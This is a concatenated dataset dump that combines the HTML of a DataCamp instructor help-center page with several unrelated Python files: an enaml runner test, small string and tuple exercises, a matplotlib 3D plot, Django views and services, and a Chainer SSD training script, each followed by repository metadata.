<script src="https://www.googletagmanager.com/gtag/js?id=UA-39297847-9" async="async" nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0="></script>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-39297847-9');
</script>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>DataCamp Help Center</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="intercom:trackingEvent" content="{"name":"Viewed Help Center","metadata":{"action":"viewed","object":"educate_home","place":"help_center","owner":"educate"}}" />
<link rel="stylesheet" media="all" href="https://intercom.help/_assets/application-d1f7d2f5ecbab279e0c25a70c759326b30d53b9cc5832e8fdc7973fe1bc09ce2.css" />
<link rel="canonical" href="http://instructor-support.datacamp.com/"/>
<link href="https://static.intercomassets.com/assets/educate/educate-favicon-64x64-at-2x-52016a3500a250d0b118c0a04ddd13b1a7364a27759483536dd1940bccdefc20.png" rel="shortcut icon" type="image/png" />
<style>
.header, .avatar__image-extra { background-color: #263e63; }
.article a, .c__primary { color: #263e63; }
.avatar__fallback { background-color: #263e63; }
article a.intercom-h2b-button { background-color: #263e63; border: 0; }
</style>
<meta property="og:title" content="DataCamp Help Center" />
<meta name="twitter:title" content="DataCamp Help Center" />
<meta property="og:type" content="website" />
<meta property="og:image" content="" />
<meta name="twitter:image" content="" />
</head>
<body class="">
<header class="header">
<div class="container header__container o__ltr" dir="ltr">
<div class="content">
<div class="mo o__centered o__reversed header__meta_wrapper">
<div class="mo__body">
<div class="header__logo">
<a href="/">
<img alt="DataCamp Help Center" src="https://downloads.intercomcdn.com/i/o/81221/856b63d438031754b681746b/4ea2737e4266936fb423911d9c587812.png" />
</a>
</div>
</div>
<div class="mo__aside">
<div class="header__home__url">
<a target="_blank" rel='noopener' href="http://www.datacamp.com/teach"><svg width="14" height="14" viewBox="0 0 14 14" xmlns="http://www.w3.org/2000/svg"><title>Group 65</title><g stroke="#FFF" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"><path d="M11.5 6.73v6.77H.5v-11h7.615M4.5 9.5l7-7M13.5 5.5v-5h-5"/></g></svg><span>Go to DataCamp</span></a>
</div>
</div>
</div>
<h1 class="header__headline">Advice and answers from the DataCamp Team</h1>
<form action="/" autocomplete="off" class="header__form search">
<input type="text" autocomplete="off" class="search__input js__search-input o__ltr" placeholder="Search for articles..." tabindex="1" name="q" value="">
<div class="search_icons">
<button type="submit" class="search__submit o__ltr"></button>
<a class="search__clear-text__icon">
<svg class="interface-icon" xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16">
<path d="M8.018 6.643L5.375 4 4 5.375l2.643 2.643L4 10.643 5.375 12l2.643-2.625L10.625 12 12 10.643 9.357 8.018 12 5.375 10.643 4z" />
</svg>
</a>
</form>
</div>
</div>
</div>
</header>
<div class="container">
<div class="content educate_content"><section class="section">
<div class="g__space">
<a href="/getting-started" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="chat-star" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linejoin="round"><path d="M20 34.942c-2.083-.12-4.292-.42-6-.942L3 39l4-9c-3.858-3.086-6-7.246-6-12C1 8.61 10.328 1 21.835 1 33.343 1 43 8.61 43 18c0 1.044-.117 2.065-.342 3.057"></path><path d="M36.016 25L40 33h7l-6 5 3 9-8-5.494L28 47l3-9-6-5h7l4.016-8z"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Getting Started</h2>
<p class="paper__preview">Everything you need to know to begin your DataCamp journey!</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2678519/square_128/pic2-1539176502.JPG?1539176502" alt="Jen Bricker avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+2</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
11 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Jen Bricker,</span> <span class='c__darker'> Yashas Roy</span> and 2 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/courses" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="devices-laptop" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round"><path d="M41 31H7V11h34v20z"></path><path d="M3 35V10a3 3 0 0 1 3-3h36a3 3 0 0 1 3 3v25m-16 0v2H19v-2H1v4a2 2 0 0 0 2 2h42a2 2 0 0 0 2-2v-4H29z" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Courses</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp courses.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2247397/square_128/IMG_2763_final_square_small-1532522734.jpg?1532522734" alt="Nick Carchedi avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2366194/square_128/richie-in-hairnet-1537451295.JPG?1537451295" alt="Richie Cotton avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+7</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
78 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Yashas Roy,</span> <span class='c__darker'> Nick Carchedi,</span> <span class='c__darker'> Richie Cotton</span> and 7 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/daily-practice" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="tools-dashboard" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round" stroke-linejoin="round"><path d="M27 31a3 3 0 0 1-6 0 3 3 0 0 1 6 0zm-.88-2.12l9.9-9.9M5 32h4m34 .002L39 32m2.553-8.27l-3.696 1.53M31.27 13.447l-1.53 3.695M24 12v4m-7.27-2.553l1.53 3.695m-7.694.422l2.826 2.83M6.447 23.73l3.695 1.53"></path><path d="M24 8C11.297 8 1 18.3 1 31v9h46v-9C47 18.3 36.703 8 24 8z"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Daily Practice</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp Daily Practice.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2734728/square_128/Anneleen_Beckers-xtra-small-1541624054.jpg?1541624054" alt="Anneleen Beckers avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
12 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Anneleen Beckers</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/projects" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="book-opened2"><path d="M24 11c0-3.866 10.297-7 23-7v33c-12.703 0-23 3.134-23 7 0-3.866-10.3-7-23-7V4c12.7 0 23 3.134 23 7zm0 0v32m-5-27.52c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.232-7.773-2.128-13-2.48m13 8.48c-3.22-1.23-7.773-2.127-13-2.48m23-15.52c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.232 7.773-2.128 13-2.48m-13 8.48c3.223-1.23 7.773-2.127 13-2.48" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Projects</h2>
<p class="paper__preview">Everything you need to know about creating DataCamp projects.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2360843/square_128/20170928_DavidV_ByBBImagery-022-1380-1537479799.jpg?1537479799" alt="David Venturi avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
19 articles in this collection
</span>
<br>
Written by <span class='c__darker'> David Venturi</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/course-editor-basics" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="book-bookmark" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linecap="round"><path d="M35 31l-6-6-6 6V7h12v24z"></path><path d="M35 9h6v38H11a4 4 0 0 1-4-4V5" stroke-linejoin="round"></path><path d="M39 9V1H11a4 4 0 0 0 0 8h12" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Course Editor Basics</h2>
<p class="paper__preview">Everything you need to know to get going with our online course editor.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2247397/square_128/IMG_2763_final_square_small-1532522734.jpg?1532522734" alt="Nick Carchedi avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
5 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins</span> and <span class='c__darker'> Nick Carchedi</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/tips-and-tricks" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="comms-mail" stroke-width="2" fill="none" fill-rule="evenodd" stroke-linejoin="round"><path d="M47 3L1 22l18 7L47 3z"></path><path d="M47 3l-8 37-20-11L47 3zM19 29v16l7-12"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Tips & Tricks</h2>
<p class="paper__preview">Become a DataCamp wizard!</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
6 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/frequently-asked-questions-faq" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="chat-question" fill="none" fill-rule="evenodd"><path d="M47 21.268c0 10.363-10.297 18.765-23 18.765-2.835 0-5.55-.418-8.058-1.184L2.725 45 7.9 34.668c-4.258-3.406-6.9-8.15-6.9-13.4C1 10.904 11.297 2.502 24 2.502s23 8.402 23 18.766z" stroke-width="2" stroke-linejoin="round"></path><path d="M25 28.502a2 2 0 1 0 0 4 2 2 0 0 0 0-4" fill="#231F1F"></path><path d="M19 17.75c0-3.312 2.686-6.124 6-6.124 3.313 0 6 2.626 6 5.938 0 3.315-2.687 5.938-6 5.938V26" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Frequently Asked Questions (FAQ)</h2>
<p class="paper__preview">Common questions that arise during content creation.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2366194/square_128/richie-in-hairnet-1537451295.JPG?1537451295" alt="Richie Cotton avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2637958/square_128/YR_Headshot-1539175806.JPG?1539175806" alt="Yashas Roy avatar" class="avatar__image">
<span class="avatar__image avatar__fallback">+3</span>
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
48 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Richie Cotton,</span> <span class='c__darker'> Yashas Roy</span> and 3 others
</div>
</div>
</div>
</div>
</div>
</a>
</div>
<div class="g__space">
<a href="/miscellaneous" class="paper ">
<div class="collection o__ltr">
<div class="collection__photo">
<svg role='img' viewBox='0 0 48 48'><g id="tools-edit"><path d="M14.932 43.968L2 47l3.033-12.93 31.2-31.203a4 4 0 0 1 5.658 0l4.247 4.243a4 4 0 0 1 0 5.656L14.932 43.968zm29.84-29.735L34.82 4.28m7.125 12.782L31.992 7.11M15.436 43.465l-9.9-9.9" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></path></g></svg>
</div>
<div class="collection_meta" dir="ltr">
<h2 class="t__h3 c__primary">Miscellaneous</h2>
<p class="paper__preview">Have a question for DataCamp, but not about creating content? You'll probably find the answer here.</p>
<div class="avatar">
<div class="avatar__photo avatars__images o__ltr">
<img src="https://static.intercomassets.com/avatars/2352718/square_128/Rebecca_Robins_-_Headshot-1535969735.jpg?1535969735" alt="Becca Robins avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2830289/square_128/IMG_0665_a-1545331304.jpg?1545331304" alt="Lisa Monteleone avatar" class="avatar__image">
<img src="https://static.intercomassets.com/avatars/2859053/square_128/gabriel_about_pic-1546620603.jpg?1546620603" alt="Gabriel de Selding avatar" class="avatar__image">
</div>
<div class="avatar__info">
<div>
<span class="c__darker">
9 articles in this collection
</span>
<br>
Written by <span class='c__darker'> Becca Robins,</span> <span class='c__darker'> Lisa Monteleone,</span> and <span class='c__darker'> Gabriel de Selding</span>
</div>
</div>
</div>
</div>
</div>
</a>
</div>
</section>
</div>
</div>
<footer class="footer">
<div class="container">
<div class="content">
<div class="u__cf" dir="ltr">
<div class="footer__logo">
<a href="/">
<img alt="DataCamp Help Center" src="https://downloads.intercomcdn.com/i/o/81221/856b63d438031754b681746b/4ea2737e4266936fb423911d9c587812.png" />
</a>
</div>
<div class="footer__advert logo">
<img src="https://intercom.help/_assets/intercom-a6a6ac0f033657af1aebe2e9e15b94a3cd5eabf6ae8b9916df6ea49099a894d8.png" alt="Intercom" />
<a href="https://www.intercom.com/intercom-link?company=DataCamp&solution=customer-support&utm_campaign=intercom-link&utm_content=We+run+on+Intercom&utm_medium=help-center&utm_referrer=http%3A%2F%2Finstructor-support.datacamp.com%2F&utm_source=desktop-web">We run on Intercom</a>
</div>
</div>
</div>
</div>
</footer>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
window.intercomSettings = {"app_id":"ug0ps1rq"};
</script>
<script nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0=">
(function(){var w=window;var ic=w.Intercom;if(typeof ic==="function"){ic('reattach_activator');ic('update',intercomSettings);}else{var d=document;var i=function(){i.c(arguments)};i.q=[];i.c=function(args){i.q.push(args)};w.Intercom=i;function l(){var s=d.createElement('script');s.type='text/javascript';s.async=true;s.src="https://widget.intercom.io/widget/ug0ps1rq";var x=d.getElementsByTagName('script')[0];x.parentNode.insertBefore(s,x);}if(w.attachEvent){w.attachEvent('onload',l);}else{w.addEventListener('load',l,false);}}})()
</script>
<script src="https://intercom.help/_assets/application-4500b8159f32efa509d5464e27ebd8e4735c3a0e4b59bd4aab6c00e8e49c04d2.js" nonce="roMnx80gAKY2kLbEPHCfV4mRv8CYMnfISDrR6mLOrD0="></script>
</body>
</html>
''' | [
"beiran@hotmail.com"
] | beiran@hotmail.com |
bfd1700ad0198fea64886e0f2aa06687748976c6 | 4979df3343d7b99a9a826bd1cb946ae79fac260c | /tests/test_runner.py | 1ecd57ab36aa321d2148d96008b681ff168fcb63 | [
"BSD-3-Clause"
] | permissive | e-calder/enaml | 753ff329fb8a2192bddbe7166581ed530fb270be | 8f02a3c1a80c0a6930508551c7de1d345095173d | refs/heads/master | 2021-07-30T01:18:29.222672 | 2021-07-27T08:51:50 | 2021-07-27T08:51:50 | 206,089,494 | 0 | 0 | NOASSERTION | 2019-09-03T13:52:44 | 2019-09-03T13:52:44 | null | UTF-8 | Python | false | false | 673 | py | import os
import sys
import pytest
from utils import enaml_run
from enaml.application import Application, deferred_call
from enaml.runner import main
@pytest.fixture
def sys_argv():
""" Fixture that saves sys.argv and restores it after the test completes
"""
argv = sys.argv
try:
yield
finally:
sys.argv = argv
def test_runner(enaml_run, sys_argv):
"""Test invoking the runner application.
"""
dir_path = os.path.abspath(os.path.split(os.path.dirname(__file__))[0])
sys.argv = ['enaml-run',
os.path.join(dir_path,
'examples', 'stdlib', 'mapped_view.enaml')]
main()
| [
"marul@laposte.net"
] | marul@laposte.net |
717c5b17513db524f9ab0c73cc8613c5a5a67ba3 | 7241757441c6ce1c51eef3860cd540d1c3cddf77 | /find.py | 4c9736c81f87a7ed290cc7ee8c0d01da71267f3e | [] | no_license | deepikagithub1994/program_files | 69ce130e934455ff10e6f268206cdb35aca87311 | 69ba23cedaca388339d2b27a846de23de56743a4 | refs/heads/master | 2020-05-18T20:11:53.380820 | 2019-05-02T17:54:34 | 2019-05-02T17:54:34 | 184,625,793 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | str1="python is a programming language"
index=str1.find("is")
print(index)
str2=str1[index:index+len(str1)]
print(str2)
| [
"noreply@github.com"
] | noreply@github.com |
e328cc4ddbb881174b91f93521be7d3e5d87ce0a | 15b7a9708d6fb6f9ae5ac55830f996c629468910 | /ch06/Ex6_16.py | 686602d686c015c0a9a4d929a1940e73303da2f7 | [] | no_license | Anancha/Python_Bible | 81dfab4ebe7f74c46615403cbd8a37b714b84df1 | d9569abf2ad60393289fcec22b81340a19e28601 | refs/heads/main | 2023-09-03T00:52:58.249183 | 2021-11-12T07:57:56 | 2021-11-12T07:57:56 | 415,224,243 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | shape_tuple1 = ("square","circle","triangle","rectangle","star")
shape_tuple2 = ("heart","oval")
print("shape_tuple1 = ",shape_tuple1)
print("shape_tuple2 = ",shape_tuple2)
length = len(shape_tuple1)
print("shape_tuple1 = ",length)
print("shape_tuple1[0] = ",shape_tuple1[0])
print("shape_tuple1[4] = ",shape_tuple1[4])
print("shape_tuple1[-5] = ",shape_tuple1[-5])
print("shape_tuple1[-1] = ",shape_tuple1[-1])
print("shape_tuple1[0:5] = ",shape_tuple1[0:5])
print("shape_tuple1[:5] = ",shape_tuple1[:5])
print("shape_tuple1[-4:] = ",shape_tuple1[-4:])
shape_tuple = shape_tuple1 + shape_tuple2
print("combine tuple1 and tuple2 = ",shape_tuple) | [
"noreply@github.com"
] | noreply@github.com |
3ff2044658927d488ab1501d7253b80a1b4ac237 | 7e511e84c0ae1fce2a21f416fd5dfe4d124911ca | /Tamisha_Damas/eCommerce/src/checkout/views.py | 80654ce4219489412dd7379372f0c67539c7e34c | [] | no_license | Tdamas/python_september_2017 | e101e5c9070dbdba2435c1ab2ccc3ab6a2667e66 | 19ee532cb605de810a50d3c20568e7f22ac7333b | refs/heads/master | 2021-09-04T06:13:08.824093 | 2018-01-16T16:03:02 | 2018-01-16T16:03:02 | 102,656,286 | 0 | 0 | null | 2017-09-06T20:41:22 | 2017-09-06T20:41:22 | null | UTF-8 | Python | false | false | 319 | py | from django.contrib.auth.decorators import login_required
# -*- coding: utf-8 -*-
# from __future__ import unicode_literals
from django.shortcuts import render
# Create your views here.
@login_required
def checkout(request):
context = {}
template = 'checkout.html'
return render(request,template,context)
| [
"tamishadamas@Tamishas-MacBook-Pro-2.local"
] | tamishadamas@Tamishas-MacBook-Pro-2.local |
571485bef085f2d83b9c9c91455f355903534501 | 599b057114525fb2d5f5cca59fea4299eebe92bc | /code/Test/第一次训练/A/src/rebuild.py | ab06c3c725683a2f13fb7ea7826da9109939fe50 | [
"MIT"
] | permissive | BYOUINZAKA/MCM2020 | f9b690dbb20fc32f7506f4319ec66b3477c1d9df | 62b71059524d10dff3b80100db608a86a4bb6d9a | refs/heads/master | 2022-12-03T04:25:21.734420 | 2020-08-07T00:33:37 | 2020-08-07T00:33:37 | 283,980,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 865 | py | import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from pandas import read_csv
from scipy import interpolate
def setAx(ax):
ax.set_xlim(-256, 256)
ax.set_ylim(-256, 256)
ax.set_zlim(0, 100)
ax.set_xlabel('X')
ax.set_ylabel('Y')
ax.set_zlabel('Z')
ax = Axes3D(plt.figure())
df = read_csv("code\\Test1\\第一次训练\\A\\circles.csv")
ax.plot3D(df['X'], df['Y'], df['Z'], 'gray')
ax.scatter3D(df['X'], df['Y'], df['Z'], cmap='b', s=900, marker='o')
setAx(ax)
datas = read_csv("code\\Test1\\第一次训练\\A\\circles.csv").to_numpy().T
y, x, z = datas[1:4]
yy = np.linspace(y[0], y[-1], 2000)
ax = Axes3D(plt.figure())
fyz = interpolate.interp1d(y, z, kind='slinear')
fyx = interpolate.interp1d(y, x, kind='slinear')
ax.scatter3D(fyx(yy), yy, fyz(yy), s=900, c='gray')
setAx(ax)
plt.show()
| [
"2606675531@qq.com"
] | 2606675531@qq.com |
fb8c703506380ca2d705c4bcfc8f8db05c33c5b4 | f79fd39560a1be43bc47b4460ffdc7f57c8d2e2f | /wk1-ex67.py | 62b9a8b57bd279eeaba3ef8bc79f18ba1e8f6e42 | [] | no_license | dmr282/python_4_neteng | f7894e9393c653fac1871f59de0dae86ca73e5dd | 1818060a17019b283397094b71679da0110e061c | refs/heads/master | 2020-03-28T21:15:14.874527 | 2018-09-18T14:57:24 | 2018-09-18T14:57:24 | 149,141,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | import yaml, json
for i in range(4):
print i
my_list = []
a = 0
b = 0
i = my_list
my_dict = {a: '1', b: '2'}
my_list.append(my_dict)
with open("some_file.yml", "w") as f:
f.write(yaml.dump(my_list, default_flow_style=False))
with open("some_file2.yml", "w") as f2:
f2.write(json.dumps(my_list))
| [
"dmr282@cornell.edu"
] | dmr282@cornell.edu |
84d30739ba48f488394835d53e76120ec6c08546 | c89b0511ce12c06e4cbfe28279a19314e042e783 | /scripts/chainer/train_utils.py | 0277bbd9b9ceefaaeef2197fe6cb923f062ba2b6 | [] | no_license | mizmizo/fcn_detector | 072fdb5d6c40c65ea3f4abbf36300d15779ea695 | 0a96b3811a0a3ae5f25f4dc1b733e5cc928b7117 | refs/heads/master | 2021-01-01T13:35:18.930162 | 2017-10-10T14:54:22 | 2017-10-10T14:54:22 | 97,581,628 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,095 | py | #!/usr/bin/env python
import copy
import numpy as np
import chainer
from chainer.datasets import TransformDataset
from chainer.optimizer import WeightDecay
from chainer import serializers
from chainer import training
from chainer.training import extensions
from chainer.training import triggers
from chainercv.extensions import DetectionVOCEvaluator
from chainercv.links.model.ssd import GradientScaling
from chainercv.links.model.ssd import multibox_loss
from chainercv.links import SSD512
from chainercv import transforms
from chainercv.links.model.ssd import random_crop_with_bbox_constraints
from chainercv.links.model.ssd import random_distort
from chainercv.links.model.ssd import resize_with_random_interpolation
from chainercv.visualizations import vis_bbox
import matplotlib.pyplot as plot
class MultiboxTrainChain(chainer.Chain):
def __init__(self, model, alpha=1, k=3):
super(MultiboxTrainChain, self).__init__()
with self.init_scope():
self.model = model
self.alpha = alpha
self.k = k
def __call__(self, imgs, gt_mb_locs, gt_mb_labels):
mb_locs, mb_confs = self.model(imgs)
loc_loss, conf_loss = multibox_loss(
mb_locs, mb_confs, gt_mb_locs, gt_mb_labels, self.k)
loss = loc_loss * self.alpha + conf_loss
chainer.reporter.report(
{'loss': loss, 'loss/loc': loc_loss, 'loss/conf': conf_loss},
self)
return loss
class Transform(object):
def __init__(self, coder, size, mean):
# to send cpu, make a copy
self.coder = copy.copy(coder)
self.coder.to_cpu()
self.size = size
self.mean = mean
def __call__(self, in_data):
# There are five data augmentation steps
# 1. Color augmentation
# 2. Random expansion
# 3. Random cropping
# 4. Resizing with random interpolation
# 5. Random horizontal flipping
img, bbox, label = in_data
# 1. Color augmentation
#img = random_distort(img)
# 2. Random expansion
# if np.random.randint(2):
# img, param = transforms.random_expand(
# img, fill=self.mean, return_param=True)
# bbox = transforms.translate_bbox(
# bbox, y_offset=param['y_offset'], x_offset=param['x_offset'])
# 3. Random cropping
# img, param = random_crop_with_bbox_constraints(
# img, bbox, return_param=True)
# bbox, param = transforms.crop_bbox(
# bbox, y_slice=param['y_slice'], x_slice=param['x_slice'],
# allow_outside_center=False, return_param=True)
# label = label[param['index']]
# 4. Resizing with random interpolatation
_, H, W = img.shape
img = resize_with_random_interpolation(img, (self.size, self.size))
bbox = transforms.resize_bbox(bbox, (H, W), (self.size, self.size))
# 5. Random horizontal flipping
# img, params = transforms.random_flip(
# img, x_random=True, return_param=True)
# bbox = transforms.flip_bbox(
# bbox, (self.size, self.size), x_flip=params['x_flip'])
# Preparation for SSD network
img -= self.mean
mb_loc, mb_label = self.coder.encode(bbox, label)
return img, mb_loc, mb_label
def train(train_data, val_data, label_names,
iteration, lr, step_points,
batchsize, gpu, out, val_iteration,
log_iteration, loaderjob,
resume):
"""Train SSD
"""
pretrained_model = SSD512(
pretrained_model='voc0712')
model = SSD512(n_fg_class=len(label_names))
model.extractor.copyparams(pretrained_model.extractor)
model.multibox.loc.copyparams(pretrained_model.multibox.loc)
model.use_preset('evaluate')
train_chain = MultiboxTrainChain(model)
if gpu >= 0:
chainer.cuda.get_device(gpu).use()
model.to_gpu()
train_data = TransformDataset(
train_data,
Transform(model.coder, model.insize, model.mean))
if loaderjob <= 0:
train_iter = chainer.iterators.SerialIterator(train_data, batchsize)
else:
train_iter = chainer.iterators.MultiprocessIterator(
train_data, batchsize, n_processes=min((loaderjob, batchsize)))
val_iter = chainer.iterators.SerialIterator(
val_data, batchsize, repeat=False, shuffle=False)
# initial lr is set by ExponentialShift
optimizer = chainer.optimizers.MomentumSGD()
optimizer.setup(train_chain)
for param in train_chain.params():
if param.name == 'b':
param.update_rule.add_hook(GradientScaling(2))
else:
param.update_rule.add_hook(WeightDecay(0.0005))
updater = training.StandardUpdater(train_iter, optimizer, device=gpu)
trainer = training.Trainer(updater, (iteration, 'iteration'), out)
trainer.extend(
extensions.ExponentialShift('lr', 0.1, init=lr),
trigger=triggers.ManualScheduleTrigger(step_points, 'iteration'))
val_interval = (val_iteration, 'iteration')
trainer.extend(
DetectionVOCEvaluator(
val_iter, model, use_07_metric=True,
label_names=label_names),
trigger=val_interval)
log_interval = log_iteration, 'iteration'
trainer.extend(extensions.LogReport(trigger=log_interval))
trainer.extend(extensions.observe_lr(), trigger=log_interval)
trainer.extend(extensions.PrintReport(
['epoch', 'iteration', 'lr',
'main/loss', 'main/loss/loc', 'main/loss/conf',
'validation/main/map']),
trigger=log_interval)
trainer.extend(extensions.ProgressBar(update_interval=10))
trainer.extend(extensions.snapshot(), trigger=val_interval)
trainer.extend(
extensions.snapshot_object(model, 'model_iter_{.updater.iteration}'),
trigger=val_interval)
if resume:
serializers.load_npz(resume, trainer)
trainer.run()
chainer.serializers.save_npz("model.npz", model)
chainer.serializers.save_npz("optimizer.npz", optimizer)
| [
"mizohana@jsk.imi.i.u-tokyo.ac.jp"
] | mizohana@jsk.imi.i.u-tokyo.ac.jp |
f1de0d7e87d247c0c994bacd5314c93f2f12f719 | 62f00da4edbf48f5198d14c2a8333b648cfb5dfc | /expedientes/services/misExpedientes.py | b02687f13b94bddf9c5b8ed53d5c2739b23a5135 | [] | no_license | sergiomaciel/juzgadosonline | 31d26ea42f3d2e5dcb5aaa931636ac2976ac7a0c | eb4ae8298410c4c3fcf04ed71f7f560a8eb200d3 | refs/heads/master | 2022-12-10T19:55:16.857326 | 2019-06-30T21:17:00 | 2019-06-30T21:17:00 | 189,388,673 | 0 | 0 | null | 2022-12-08T05:48:06 | 2019-05-30T09:51:11 | JavaScript | UTF-8 | Python | false | false | 2,387 | py | import sys
from django.core.exceptions import ObjectDoesNotExist
from django.contrib.auth.models import User
from datetime import datetime
from expedientes.models import Expediente, Actualizacion
from juzgados.services import juzgadoService
class MisExpediente():
def __init__(self, user:User):
self.user = user
self.suscripciones = []
self.autor = Expediente.objects.filter(autor=self.user)
expedientes = Expediente.objects.filter(subscriptores=self.user)
for expediente in expedientes:
try:
actualizaciones = Actualizacion.objects.filter(expediente=expediente.pk).order_by('-fecha_publicado')
ultimaAct = actualizaciones[0].fecha_publicado
item = {
'id':expediente.pk,
'numero':expediente.numero,
'juzgado':expediente.juzgado,
'ultimaAct':ultimaAct,
'DiasUltimaAct':(datetime.now() - datetime.strptime(ultimaAct.strftime('%Y-%m-%d'), "%Y-%m-%d")).days
}
self.suscripciones.append(item)
except IndexError:
pass
def suscriptos(self):
return self.suscripciones
def novedades(self, hasta):
novedades = []
for expediente in self.suscripciones:
if ( int(expediente.get('DiasUltimaAct')) <= int(hasta)):
novedades.append(expediente)
return novedades
